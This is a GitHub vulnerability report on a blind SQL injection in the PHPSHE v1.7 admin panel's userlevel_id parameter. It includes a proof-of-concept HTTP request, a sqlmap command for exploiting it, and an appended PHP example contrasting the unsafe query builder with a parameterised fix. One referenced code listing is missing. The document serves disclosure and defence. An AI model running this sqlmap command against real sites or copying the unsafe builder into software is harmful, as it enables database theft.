phpshe v1.7 Blind SQL injection #1
Mint60 opened this issue Apr 14, 2020 · 0 comments
Mint60 commented Apr 14, 2020

0x01 Vulnerability description
Test object:
(1) website: PHPSHE shopping system V1.7
(2) website domain name: http://www.phpshe.com/
(3) IP address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C mall system v1.7 (build 20180905 UTF8)
Vulnerability description:
Lingbao Jianhao Network Technology Co., Ltd. PHPSHE CMS system backend SQL injection vulnerability.
0x02 Vulnerability details
The execution flow at admin.php line 87 includes user.php.

user.php line 7 includes user.hook.php.

user.hook.php line 155 calls the pe_select function for the user level adjustment.

The pe_select function is defined on line 208 of ../include/class/db.class.php.
In the pe_select function, the value of the userlevel_id parameter is passed through the dowhere function and finally concatenated directly into the SQL statement; there is no security filtering.

The code of the _dowhere function:

0x03 POC
Vulnerability parameter userlevel_id
GET /phpshe1.7/admin.php?mod=user&userlevel_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r3kqgf03cae7qguj1sjncb5apk
Upgrade-Insecure-Requests: 1
Vulnerability verification method:
python sqlmap.py -r 1.txt --batch -o --dbms=mysql --level 3 -p userlevel_id
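As an added example (not code from the phpshe project or from this report): the pattern the report describes, a WHERE-clause builder that splices a request parameter straight into the SQL text, shown next to a hardened version that emits placeholders, returns the values for binding, restricts column names to an allow-list, and validates the integer id before it reaches the builder at all. The helper names (build_where_unsafe, build_where_safe, validate_id), the `userlevel` table name and the sample input are assumptions chosen for the illustration.

```php
<?php
// Added illustration for this issue; not phpshe's own code. The helper names,
// the `userlevel` table name and the sample input are assumptions that mirror
// the report's description of a WHERE-clause builder splicing values into SQL.

// Vulnerable pattern: every value is interpolated into the SQL text, so the
// structure of the query depends on user-controlled input.
function build_where_unsafe(array $where): string
{
    $parts = [];
    foreach ($where as $column => $value) {
        $parts[] = "`{$column}` = {$value}";   // no quoting, casting or escaping
    }
    return $parts === [] ? '' : ' WHERE ' . implode(' AND ', $parts);
}

// Hardened pattern: the SQL text contains only placeholders, the values are
// returned separately for binding, and column names are checked against an
// allow-list so the key side of the array cannot alter the query either.
function build_where_safe(array $where, array $allowedColumns): array
{
    $parts  = [];
    $params = [];
    foreach ($where as $column => $value) {
        if (!in_array($column, $allowedColumns, true)) {
            throw new InvalidArgumentException("Unknown column: {$column}");
        }
        $parts[]  = "`{$column}` = ?";
        $params[] = $value;
    }
    $sql = $parts === [] ? '' : ' WHERE ' . implode(' AND ', $parts);
    return [$sql, $params];
}

// For an id that must be a positive integer, reject anything else up front.
// Returns null for invalid input so the caller can answer with 400.
function validate_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Constructed sample input standing in for $_GET['userlevel_id'].
$raw = '1';

// Vulnerable form: the SQL string itself changes with whatever the client sent.
echo 'unsafe: SELECT * FROM `userlevel`'
    . build_where_unsafe(['userlevel_id' => $raw]) . PHP_EOL;

// Hardened form: validate first, then build a fixed query with bound values.
$id = validate_id($raw);
if ($id === null) {
    http_response_code(400);
    exit('invalid userlevel_id');
}
[$whereSql, $params] = build_where_safe(['userlevel_id' => $id], ['userlevel_id']);
echo 'safe:   SELECT * FROM `userlevel`' . $whereSql
    . '  params=' . json_encode($params) . PHP_EOL;

// Executing the hardened form with PDO (connection values are placeholders):
// $pdo  = new PDO('mysql:host=DB_HOST;dbname=DB_NAME', 'DB_USER', 'DB_PASS');
// $stmt = $pdo->prepare('SELECT * FROM `userlevel`' . $whereSql);
// $stmt->execute($params);
```

The point of the split return value in build_where_safe is that the SQL text never contains request data: whatever arrives in userlevel_id, the statement the database parses is always the same, and the value travels through the driver's parameter binding. The integer check in validate_id is a second, independent layer; it also gives a clean 400 response instead of a database error that a blind injection probe could time or compare against.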
